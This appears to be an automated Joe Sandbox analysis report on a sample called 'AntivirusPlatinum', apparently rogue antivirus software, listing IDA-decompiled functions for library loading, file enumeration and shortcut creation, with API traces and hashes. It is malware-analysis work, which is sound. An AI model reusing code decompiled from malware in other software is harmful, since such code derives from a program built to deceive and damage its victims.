API calls 11837->11838 11839 4019a4 11837->11839 11838->11837 11839->11820 11840 401722 11839->11840 11841 402511 59 API calls 11840->11841 11842 40173e 11841->11842 11843 401742 11842->11843 11844 401751 11842->11844 11845 4017c6 11842->11845 11843->11820 11875 401278 11844->11875 11845->11843 11848 4016a4 34 API calls 11845->11848 11847 40175f 11851 401708 34 API calls 11847->11851 11849 4017d6 11848->11849 11850 4016bf 34 API calls 11849->11850 11852 4017e1 11850->11852 11854 40177f 11851->11854 11853 40e144 MultiByteToWideChar 11852->11853 11855 4017ee 11853->11855 11856 40e115 WideCharToMultiByte 11854->11856 11857 401708 34 API calls 11855->11857 11858 401788 11856->11858 11859 4017f6 11857->11859 11860 401708 34 API calls 11858->11860 11862 4016bf 34 API calls 11859->11862 11861 40179f 11860->11861 11863 4017ba 11861->11863 11880 4016d9 11861->11880 11862->11843 11863->11843 11866 40a205 ctype 2 API calls 11863->11866 11865 4017b1 11867 4016bf 34 API calls 11865->11867 11866->11843 11867->11863 11869 4016d1 11868->11869 11870 4016c8 11868->11870 11872 4016a4 11869->11872 11871 4012b7 34 API calls 11870->11871 11871->11869 11873 401313 34 API calls 11872->11873 11874 4016ae 11873->11874 11874->11830 11885 40a1ec GetProcessHeap RtlAllocateHeap 11875->11885 11877 401289 11878 40129d 11877->11878 11879 403443 30 API calls 11877->11879 11878->11847 11879->11878 11881 40dbcb 2 API calls 11880->11881 11882 4016e2 11881->11882 11883 4016bf 34 API calls 11882->11883 11884 4016f0 11883->11884 11884->11865 11885->11877 11886->10334 11888 4066d8 11887->11888 11889 40672d VariantInit 11888->11889 11891 4066f1 PeekMessageA 11888->11891 11890 40675d 11889->11890 11890->10341 11892 406703 TranslateMessage DispatchMessageA GetMessageA 11891->11892 11893 406724 GetTickCount 11891->11893 11892->11893 11893->11888 11894->10347 11896 4065f8 11895->11896 11907 40a1ec GetProcessHeap RtlAllocateHeap 11896->11907 11898 4066ac 11898->10348 11899 40a205 ctype 2 API calls 11899->11898 11900 406606 11900->11898 11900->11899 11902 406a28 11901->11902 11908 40a1ec GetProcessHeap RtlAllocateHeap 11902->11908 11904 406b4a 11904->10352 11905 40a5bd CompareStringA 11906 406a2f 11905->11906 11906->11904 11906->11905 11907->11900 11908->11906 12083 40cb2b 12084 40309d 15 API calls 12083->12084 12085 40cb4b 12084->12085 12087 40cb83 SendMessageA 12085->12087 12088 40cb8e 12085->12088 12091 40cb55 12085->12091 12086 40cb66 12087->12088 12089 40cba7 12088->12089 12090 40cb97 SendDlgItemMessageA 12088->12090 12093 40ba36 28 API calls 12089->12093 12090->12089 12091->12086 12092 40cc14 EndDialog 12091->12092 12092->12086 12094 40cbad GetDlgItem SendMessageA GetSysColor SendMessageA 12093->12094 12095 40bf99 43 API calls 12094->12095 12096 40cbe8 12095->12096 12096->12091 12097 40cbf2 12096->12097 12098 406d54 29 API calls 12097->12098 12099 40cc05 12098->12099 12100 40a205 ctype 2 API calls 12099->12100 12101 40cc10 12100->12101 12101->12086

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 763 411585-4115cd LoadLibraryA * 2 #17 LoadLibraryA 764 4115ec-4115fc SHGetMalloc 763->764 765 4115cf-4115dd GetProcAddress 763->765 766 4115e5-4115e6 FreeLibrary 765->766 767 4115df-4115e2 765->767 766->764 767->766
                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                              			E00411585(signed int* __ecx) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v12;
                                                                                                                                                              				struct HINSTANCE__* _t7;
                                                                                                                                                              				_Unknown_base(*)()* _t11;
                                                                                                                                                              				void* _t16;
                                                                                                                                                              				struct HINSTANCE__* _t18;
                                                                                                                                                              				void* _t20;
                                                                                                                                                              				struct HINSTANCE__** _t21;
                                                                                                                                                              
                                                                                                                                                              				_t21 = __ecx;
                                                                                                                                                              				__ecx[1] = __ecx[1] & 0x00000000;
                                                                                                                                                              				 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                              				_t7 = LoadLibraryA("riched32.dll"); // executed
                                                                                                                                                              				 *_t21 = _t7;
                                                                                                                                                              				_t21[1] = LoadLibraryA("riched20.dll");
                                                                                                                                                              				__imp__#17(_t16, _t20, __ecx, __ecx);
                                                                                                                                                              				_v12 = 8;
                                                                                                                                                              				_v8 = 0x7ff;
                                                                                                                                                              				_t18 = LoadLibraryA("COMCTL32.DLL");
                                                                                                                                                              				if(_t18 != 0) {
                                                                                                                                                              					_t11 = GetProcAddress(_t18, "InitCommonControlsEx");
                                                                                                                                                              					if(_t11 != 0) {
                                                                                                                                                              						 *_t11( &_v12);
                                                                                                                                                              					}
                                                                                                                                                              					FreeLibrary(_t18);
                                                                                                                                                              				}
                                                                                                                                                              				__imp__SHGetMalloc(0x41fff0); // executed
                                                                                                                                                              				return _t21;
                                                                                                                                                              			}











                                                                                                                                                              0x00411592
                                                                                                                                                              0x00411594
                                                                                                                                                              0x00411598
                                                                                                                                                              0x004115a0
                                                                                                                                                              0x004115a7
                                                                                                                                                              0x004115ab
                                                                                                                                                              0x004115ae
                                                                                                                                                              0x004115b9
                                                                                                                                                              0x004115c0
                                                                                                                                                              0x004115c9
                                                                                                                                                              0x004115cd
                                                                                                                                                              0x004115d5
                                                                                                                                                              0x004115dd
                                                                                                                                                              0x004115e3
                                                                                                                                                              0x004115e3
                                                                                                                                                              0x004115e6
                                                                                                                                                              0x004115e6
                                                                                                                                                              0x004115f1
                                                                                                                                                              0x004115fc

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryA.KERNELBASE(riched32.dll,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,?,?,?,0040D3EE), ref: 004115A0
                                                                                                                                                              • LoadLibraryA.KERNEL32(riched20.dll,?,0040D3EE), ref: 004115A9
                                                                                                                                                              • #17.COMCTL32(?,0040D3EE), ref: 004115AE
                                                                                                                                                              • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,0040D3EE), ref: 004115C7
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004115D5
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,0040D3EE), ref: 004115E6
                                                                                                                                                              • SHGetMalloc.SHELL32(0041FFF0), ref: 004115F1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$Load$AddressFreeMallocProc
                                                                                                                                                              • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$COMCTL32.DLL$InitCommonControlsEx$riched20.dll$riched32.dll
                                                                                                                                                              • API String ID: 253899923-674676180
                                                                                                                                                              • Opcode ID: e3c62c2280fe2742b857e97263135e7d095fb7be557769444439f8313c917933
                                                                                                                                                              • Instruction ID: 315302b8a226ed3062516fc9a18bbbd533a07d3aa027722884380aaa5de4aa0e
                                                                                                                                                              • Opcode Fuzzy Hash: e3c62c2280fe2742b857e97263135e7d095fb7be557769444439f8313c917933
                                                                                                                                                              • Instruction Fuzzy Hash: 3DF08671600304BBD710ABA5CD09BEAFBE8EF84711F21812EE151D3190DBF8D490CB28
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 875 405c10-405c2a call 406ea5 878 405c30-405c35 875->878 879 405dec-405df1 875->879 880 405c37-405c3b 878->880 881 405c4c-405c57 call 40e144 878->881 882 405df3-405df6 879->882 883 405e07-405e12 call 40e115 879->883 880->881 885 405c3d-405c4a call 40e338 880->885 890 405c5c-405c6c 881->890 882->883 887 405df8-405e05 call 40a477 882->887 888 405e17-405e27 883->888 885->890 887->888 893 405e29-405e3b FindFirstFileA 888->893 894 405e5f-405e6a FindNextFileA 888->894 896 405ca2-405cad FindNextFileW 890->896 897 405c6e-405c80 FindFirstFileW 890->897 900 405e8a-405f92 call 40a477 call 4073db call 40a477 call 40e144 call 401030 call 40a477 call 40df79 * 3 call 40ded1 call 40dadd 893->900 901 405e3d-405e46 893->901 904 405e81-405e84 894->904 905 405e6c-405e7b 894->905 898 405cc4-405cc7 896->898 899 405caf-405cbe 896->899 902 405c82-405c8b 897->902 903 405ccd-405ddc call 40e338 call 407432 call 40e338 call 40e115 call 401030 call 40e115 call 40df79 * 3 call 40ded1 call 40dafb 897->903 898->903 906 405f99-405faa 898->906 899->898 900->906 962 405f94-405f96 900->962 917 405e52 901->917 918 405e48 901->918 902->917 919 405c91-405c94 902->919 903->906 963 405de2-405de7 903->963 904->900 904->906 905->904 923 405e54-405e5a 917->923 922 405e4b 918->922 919->917 924 405c9a-405c9d 919->924 922->917 927 405e4d-405e50 922->927 923->906 924->922 927->923 962->906 963->906
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E00405C10(void* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				char* _t98;
                                                                                                                                                              				void* _t134;
                                                                                                                                                              				char _t136;
                                                                                                                                                              				short* _t140;
                                                                                                                                                              				intOrPtr _t169;
                                                                                                                                                              				void* _t175;
                                                                                                                                                              				long _t176;
                                                                                                                                                              				signed int _t179;
                                                                                                                                                              				void* _t180;
                                                                                                                                                              				short* _t182;
                                                                                                                                                              				void* _t183;
                                                                                                                                                              				void* _t186;
                                                                                                                                                              				intOrPtr _t197;
                                                                                                                                                              				short* _t204;
                                                                                                                                                              				intOrPtr _t206;
                                                                                                                                                              				void* _t208;
                                                                                                                                                              				void* _t210;
                                                                                                                                                              				void* _t221;
                                                                                                                                                              
                                                                                                                                                              				_t197 = __edx;
                                                                                                                                                              				_t186 = __ecx;
                                                                                                                                                              				_t208 = _t210 - 0x68;
                                                                                                                                                              				_push(_t179);
                                                                                                                                                              				if(E00406EA5() == 0) {
                                                                                                                                                              					_t98 =  *((intOrPtr*)(_t208 + 0x74));
                                                                                                                                                              					if(_t98 == 0 ||  *_t98 == 0) {
                                                                                                                                                              						E0040E115(_t186,  *((intOrPtr*)(_t208 + 0x78)), _t208 - 0x5e8, 0x1000000);
                                                                                                                                                              					} else {
                                                                                                                                                              						E0040A477(_t208 - 0x5e8, _t98);
                                                                                                                                                              					}
                                                                                                                                                              					_t206 =  *((intOrPtr*)(_t208 + 0x7c));
                                                                                                                                                              					_t180 = _t179 | 0xffffffff;
                                                                                                                                                              					_push(_t208 - 0xd8);
                                                                                                                                                              					if( *(_t208 + 0x70) != _t180) {
                                                                                                                                                              						if(FindNextFileA( *(_t208 + 0x70), ??) == 0) {
                                                                                                                                                              							 *(_t208 + 0x70) = _t180;
                                                                                                                                                              							 *((char*)(_t206 + 0x109c)) = GetLastError() & 0xffffff00 | _t131 != 0x00000012;
                                                                                                                                                              						}
                                                                                                                                                              						if( *(_t208 + 0x70) == _t180) {
                                                                                                                                                              							goto L32;
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L30;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t134 = FindFirstFileA(_t208 - 0x5e8, ??);
                                                                                                                                                              						 *(_t208 + 0x70) = _t134;
                                                                                                                                                              						if(_t134 != _t180) {
                                                                                                                                                              							L30:
                                                                                                                                                              							E0040A477(_t206, _t208 - 0x5e8);
                                                                                                                                                              							E0040A477(E004073DB(_t206), _t208 - 0xac);
                                                                                                                                                              							_t182 = _t206 + 0x400;
                                                                                                                                                              							E0040E144(_t206, _t182, 0x1000000);
                                                                                                                                                              							 *((intOrPtr*)(_t206 + 0xc00)) = E00401030( *((intOrPtr*)(_t208 - 0xbc)), 0, 0, 1) +  *((intOrPtr*)(_t208 - 0xb8));
                                                                                                                                                              							 *((intOrPtr*)(_t206 + 0xc08)) =  *((intOrPtr*)(_t208 - 0xd8));
                                                                                                                                                              							asm("adc edx, edi");
                                                                                                                                                              							 *((intOrPtr*)(_t206 + 0xc04)) = _t197;
                                                                                                                                                              							E0040A477(_t206 + 0xc80, _t208 + 0x58);
                                                                                                                                                              							 *((intOrPtr*)(_t206 + 0x1080)) =  *((intOrPtr*)(_t208 - 0xd4));
                                                                                                                                                              							 *((intOrPtr*)(_t206 + 0x1084)) =  *((intOrPtr*)(_t208 - 0xd0));
                                                                                                                                                              							 *((intOrPtr*)(_t206 + 0x1088)) =  *((intOrPtr*)(_t208 - 0xcc));
                                                                                                                                                              							 *((intOrPtr*)(_t206 + 0x108c)) =  *((intOrPtr*)(_t208 - 0xc8));
                                                                                                                                                              							 *((intOrPtr*)(_t206 + 0x1090)) =  *((intOrPtr*)(_t208 - 0xc4));
                                                                                                                                                              							 *((intOrPtr*)(_t206 + 0x1094)) =  *((intOrPtr*)(_t208 - 0xc0));
                                                                                                                                                              							E0040DF79(_t182, _t206 + 0xc14, _t208 - 0xc4);
                                                                                                                                                              							E0040DF79(_t182, _t206 + 0xc38, _t208 - 0xd4);
                                                                                                                                                              							E0040DF79(_t182, _t206 + 0xc5c, _t208 - 0xcc);
                                                                                                                                                              							 *((intOrPtr*)(_t206 + 0xc0c)) = E0040DED1(_t206 + 0xc14);
                                                                                                                                                              							if(E0040DADD(_t206) != 0) {
                                                                                                                                                              								 *_t182 = 0;
                                                                                                                                                              							}
                                                                                                                                                              							L32:
                                                                                                                                                              							 *(_t206 + 0x1098) =  *(_t206 + 0x1098) & 0x00000000;
                                                                                                                                                              							return  *(_t208 + 0x70);
                                                                                                                                                              						}
                                                                                                                                                              						if(GetLastError() == 2) {
                                                                                                                                                              							L25:
                                                                                                                                                              							_t136 = 0;
                                                                                                                                                              							L26:
                                                                                                                                                              							 *((char*)(_t206 + 0x109c)) = _t136;
                                                                                                                                                              							goto L32;
                                                                                                                                                              						}
                                                                                                                                                              						L23:
                                                                                                                                                              						if(_t221 == 0) {
                                                                                                                                                              							goto L25;
                                                                                                                                                              						}
                                                                                                                                                              						_t136 = 1;
                                                                                                                                                              						goto L26;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t140 =  *((intOrPtr*)(_t208 + 0x78));
                                                                                                                                                              				if(_t140 == 0 ||  *_t140 == 0) {
                                                                                                                                                              					E0040E144( *((intOrPtr*)(_t208 + 0x74)), _t208 - 0x9e8, 0x1000000);
                                                                                                                                                              				} else {
                                                                                                                                                              					E0040E338(_t208 - 0x9e8, _t140);
                                                                                                                                                              				}
                                                                                                                                                              				_t206 =  *((intOrPtr*)(_t208 + 0x7c));
                                                                                                                                                              				_t183 = _t179 | 0xffffffff;
                                                                                                                                                              				_push(_t208 - 0x1e8);
                                                                                                                                                              				if( *(_t208 + 0x70) != _t183) {
                                                                                                                                                              					if(FindNextFileW( *(_t208 + 0x70), ??) == 0) {
                                                                                                                                                              						 *(_t208 + 0x70) = _t183;
                                                                                                                                                              						 *((char*)(_t206 + 0x109c)) = GetLastError() & 0xffffff00 | _t172 != 0x00000012;
                                                                                                                                                              					}
                                                                                                                                                              					if( *(_t208 + 0x70) == _t183) {
                                                                                                                                                              						goto L32;
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L13;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t175 = FindFirstFileW(_t208 - 0x9e8, ??); // executed
                                                                                                                                                              					 *(_t208 + 0x70) = _t175;
                                                                                                                                                              					if(_t175 != _t183) {
                                                                                                                                                              						L13:
                                                                                                                                                              						E0040E338(_t206 + 0x400, _t208 - 0x9e8);
                                                                                                                                                              						E0040E338(E00407432(_t206 + 0x400), _t208 - 0x1bc);
                                                                                                                                                              						E0040E115(_t186, _t206 + 0x400, _t206, 0x1000000);
                                                                                                                                                              						 *((intOrPtr*)(_t206 + 0xc00)) = E00401030( *((intOrPtr*)(_t208 - 0x1cc)), 0, 0, 1) +  *((intOrPtr*)(_t208 - 0x1c8));
                                                                                                                                                              						 *((intOrPtr*)(_t206 + 0xc08)) =  *((intOrPtr*)(_t208 - 0x1e8));
                                                                                                                                                              						asm("adc edx, ebx");
                                                                                                                                                              						 *((intOrPtr*)(_t206 + 0xc04)) = _t197;
                                                                                                                                                              						E0040E115( *((intOrPtr*)(_t208 - 0x1c8)), _t208 + 0x4c, _t206 + 0xc80, 0x1000000);
                                                                                                                                                              						 *((intOrPtr*)(_t206 + 0x1080)) =  *((intOrPtr*)(_t208 - 0x1e4));
                                                                                                                                                              						 *((intOrPtr*)(_t206 + 0x1084)) =  *((intOrPtr*)(_t208 - 0x1e0));
                                                                                                                                                              						 *((intOrPtr*)(_t206 + 0x1088)) =  *((intOrPtr*)(_t208 - 0x1dc));
                                                                                                                                                              						 *((intOrPtr*)(_t206 + 0x108c)) =  *((intOrPtr*)(_t208 - 0x1d8));
                                                                                                                                                              						 *((intOrPtr*)(_t206 + 0x1090)) =  *((intOrPtr*)(_t208 - 0x1d4));
                                                                                                                                                              						 *((intOrPtr*)(_t206 + 0x1094)) =  *((intOrPtr*)(_t208 - 0x1d0));
                                                                                                                                                              						E0040DF79(0, _t206 + 0xc14, _t208 - 0x1d4);
                                                                                                                                                              						E0040DF79(0, _t206 + 0xc38, _t208 - 0x1e4);
                                                                                                                                                              						E0040DF79(0, _t206 + 0xc5c, _t208 - 0x1dc);
                                                                                                                                                              						_t169 = E0040DED1(_t206 + 0xc14);
                                                                                                                                                              						_t204 = _t206 + 0x400;
                                                                                                                                                              						 *((intOrPtr*)(_t206 + 0xc0c)) = _t169;
                                                                                                                                                              						if(E0040DAFB(_t204) != 0) {
                                                                                                                                                              							 *_t204 = 0;
                                                                                                                                                              						}
                                                                                                                                                              						goto L32;
                                                                                                                                                              					}
                                                                                                                                                              					_t176 = GetLastError();
                                                                                                                                                              					if(_t176 == 2 || _t176 == 3) {
                                                                                                                                                              						goto L25;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t221 = _t176 - 0x12;
                                                                                                                                                              						goto L23;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}






















                                                                                                                                                              0x00405c10
                                                                                                                                                              0x00405c10
                                                                                                                                                              0x00405c11
                                                                                                                                                              0x00405c1b
                                                                                                                                                              0x00405c2a
                                                                                                                                                              0x00405dec
                                                                                                                                                              0x00405df1
                                                                                                                                                              0x00405e12
                                                                                                                                                              0x00405df8
                                                                                                                                                              0x00405e00
                                                                                                                                                              0x00405e00
                                                                                                                                                              0x00405e17
                                                                                                                                                              0x00405e1a
                                                                                                                                                              0x00405e23
                                                                                                                                                              0x00405e27
                                                                                                                                                              0x00405e6a
                                                                                                                                                              0x00405e6c
                                                                                                                                                              0x00405e7b
                                                                                                                                                              0x00405e7b
                                                                                                                                                              0x00405e84
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e29
                                                                                                                                                              0x00405e30
                                                                                                                                                              0x00405e36
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00405e8a
                                                                                                                                                              0x00405e92
                                                                                                                                                              0x00405ea5
                                                                                                                                                              0x00405eab
                                                                                                                                                              0x00405eb3
                                                                                                                                                              0x00405ed3
                                                                                                                                                              0x00405edf
                                                                                                                                                              0x00405eef
                                                                                                                                                              0x00405ef2
                                                                                                                                                              0x00405ef8
                                                                                                                                                              0x00405f03
                                                                                                                                                              0x00405f0f
                                                                                                                                                              0x00405f1b
                                                                                                                                                              0x00405f27
                                                                                                                                                              0x00405f33
                                                                                                                                                              0x00405f3f
                                                                                                                                                              0x00405f54
                                                                                                                                                              0x00405f66
                                                                                                                                                              0x00405f78
                                                                                                                                                              0x00405f85
                                                                                                                                                              0x00405f92
                                                                                                                                                              0x00405f96
                                                                                                                                                              0x00405f96
                                                                                                                                                              0x00405f99
                                                                                                                                                              0x00405f99
                                                                                                                                                              0x00405faa
                                                                                                                                                              0x00405faa
                                                                                                                                                              0x00405e46
                                                                                                                                                              0x00405e52
                                                                                                                                                              0x00405e52
                                                                                                                                                              0x00405e54
                                                                                                                                                              0x00405e54
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e54
                                                                                                                                                              0x00405e4b
                                                                                                                                                              0x00405e4b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e4f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e4f
                                                                                                                                                              0x00405e27
                                                                                                                                                              0x00405c30
                                                                                                                                                              0x00405c35
                                                                                                                                                              0x00405c57
                                                                                                                                                              0x00405c3d
                                                                                                                                                              0x00405c45
                                                                                                                                                              0x00405c45
                                                                                                                                                              0x00405c5c
                                                                                                                                                              0x00405c5f
                                                                                                                                                              0x00405c68
                                                                                                                                                              0x00405c6c
                                                                                                                                                              0x00405cad
                                                                                                                                                              0x00405caf
                                                                                                                                                              0x00405cbe
                                                                                                                                                              0x00405cbe
                                                                                                                                                              0x00405cc7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405c6e
                                                                                                                                                              0x00405c75
                                                                                                                                                              0x00405c7b
                                                                                                                                                              0x00405c80
                                                                                                                                                              0x00405ccd
                                                                                                                                                              0x00405cdb
                                                                                                                                                              0x00405cee
                                                                                                                                                              0x00405cf6
                                                                                                                                                              0x00405d16
                                                                                                                                                              0x00405d22
                                                                                                                                                              0x00405d33
                                                                                                                                                              0x00405d36
                                                                                                                                                              0x00405d3c
                                                                                                                                                              0x00405d47
                                                                                                                                                              0x00405d53
                                                                                                                                                              0x00405d5f
                                                                                                                                                              0x00405d6b
                                                                                                                                                              0x00405d77
                                                                                                                                                              0x00405d83
                                                                                                                                                              0x00405d98
                                                                                                                                                              0x00405daa
                                                                                                                                                              0x00405dbc
                                                                                                                                                              0x00405dc3
                                                                                                                                                              0x00405dc8
                                                                                                                                                              0x00405dcf
                                                                                                                                                              0x00405ddc
                                                                                                                                                              0x00405de4
                                                                                                                                                              0x00405de4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ddc
                                                                                                                                                              0x00405c82
                                                                                                                                                              0x00405c8b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405c9a
                                                                                                                                                              0x00405c9a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405c9a
                                                                                                                                                              0x00405c8b

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,00000000,?,01000000,?,?,00000000), ref: 00405C75
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405C82
                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,00000000,?,01000000,?,?,00000000), ref: 00405CA5
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405CB2
                                                                                                                                                                • Part of subcall function 0040E115: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,00405198,?,?,01000000,?), ref: 0040E12F
                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,00000002,?,01000000,?,?,00000000), ref: 00405E30
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405E3D
                                                                                                                                                              • FindNextFileA.KERNEL32(?,?,00000002,?,01000000,?,?,00000000), ref: 00405E62
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405E6F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileFindLast$FirstNext$ByteCharMultiVersionWide
                                                                                                                                                              • String ID: @Met
                                                                                                                                                              • API String ID: 3067395930-2381362037
                                                                                                                                                              • Opcode ID: 1a45d5538c5dfd2a89186e743a16fdedd99f6725e566e313df3d702d666fbaf3
                                                                                                                                                              • Instruction ID: e8a49d90b98f97b96c040a5bbc5ad6dfd2bbe94d724088299ed6a28abedc6e2c
                                                                                                                                                              • Opcode Fuzzy Hash: 1a45d5538c5dfd2a89186e743a16fdedd99f6725e566e313df3d702d666fbaf3
                                                                                                                                                              • Instruction Fuzzy Hash: 0EA109B19006489BDB20EF75CC81BDB77F8EF04304F10496BE59AE2291DB78AA85CF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                              			E0040A9BD(intOrPtr _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				short _v532;
                                                                                                                                                              				char _v1556;
                                                                                                                                                              				char* _t34;
                                                                                                                                                              				intOrPtr* _t36;
                                                                                                                                                              				intOrPtr* _t38;
                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                              				intOrPtr* _t46;
                                                                                                                                                              				intOrPtr* _t50;
                                                                                                                                                              				intOrPtr* _t52;
                                                                                                                                                              				intOrPtr* _t54;
                                                                                                                                                              				intOrPtr* _t56;
                                                                                                                                                              				intOrPtr* _t58;
                                                                                                                                                              				int _t60;
                                                                                                                                                              
                                                                                                                                                              				_t60 = 0;
                                                                                                                                                              				__imp__OleInitialize(0);
                                                                                                                                                              				_t34 =  &_v8;
                                                                                                                                                              				__imp__CoCreateInstance(0x4128cc, 0, 1, 0x41281c, _t34); // executed
                                                                                                                                                              				if(_t34 >= 0) {
                                                                                                                                                              					_t36 = _v8;
                                                                                                                                                              					 *((intOrPtr*)( *_t36 + 0x50))(_t36, _a4);
                                                                                                                                                              					_t38 = _v8;
                                                                                                                                                              					 *((intOrPtr*)( *_t38 + 0x1c))(_t38, _a12);
                                                                                                                                                              					if(_a16 != 0) {
                                                                                                                                                              						_t58 = _v8;
                                                                                                                                                              						 *((intOrPtr*)( *_t58 + 0x44))(_t58, _a16, 0);
                                                                                                                                                              					}
                                                                                                                                                              					if(_a20 != _t60) {
                                                                                                                                                              						_t56 = _v8;
                                                                                                                                                              						 *((intOrPtr*)( *_t56 + 0x2c))(_t56, _a20);
                                                                                                                                                              					}
                                                                                                                                                              					E0040A477( &_v1556, _a4);
                                                                                                                                                              					E00407720( &_v1556);
                                                                                                                                                              					if(_v1556 != _t60) {
                                                                                                                                                              						_t54 = _v8;
                                                                                                                                                              						 *((intOrPtr*)( *_t54 + 0x24))(_t54,  &_v1556);
                                                                                                                                                              					}
                                                                                                                                                              					_t44 = _v8;
                                                                                                                                                              					_push( &_v12);
                                                                                                                                                              					_push(0x4128bc);
                                                                                                                                                              					_push(_t44);
                                                                                                                                                              					if( *((intOrPtr*)( *_t44))() >= 0) {
                                                                                                                                                              						MultiByteToWideChar(_t60, _t60, _a8, 0xffffffff,  &_v532, 0x104);
                                                                                                                                                              						_t50 = _v12;
                                                                                                                                                              						_push(1);
                                                                                                                                                              						_push( &_v532);
                                                                                                                                                              						_push(_t50); // executed
                                                                                                                                                              						if( *((intOrPtr*)( *_t50 + 0x18))() >= 0) {
                                                                                                                                                              							_t60 = 1;
                                                                                                                                                              						}
                                                                                                                                                              						_t52 = _v12;
                                                                                                                                                              						 *((intOrPtr*)( *_t52 + 8))(_t52);
                                                                                                                                                              					}
                                                                                                                                                              					_t46 = _v8;
                                                                                                                                                              					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                              				}
                                                                                                                                                              				__imp__OleUninitialize();
                                                                                                                                                              				return _t60;
                                                                                                                                                              			}


















                                                                                                                                                              0x0040a9c7
                                                                                                                                                              0x0040a9ca
                                                                                                                                                              0x0040a9d0
                                                                                                                                                              0x0040a9e1
                                                                                                                                                              0x0040a9e9
                                                                                                                                                              0x0040a9ef
                                                                                                                                                              0x0040a9f8
                                                                                                                                                              0x0040a9fb
                                                                                                                                                              0x0040aa04
                                                                                                                                                              0x0040aa0a
                                                                                                                                                              0x0040aa0c
                                                                                                                                                              0x0040aa16
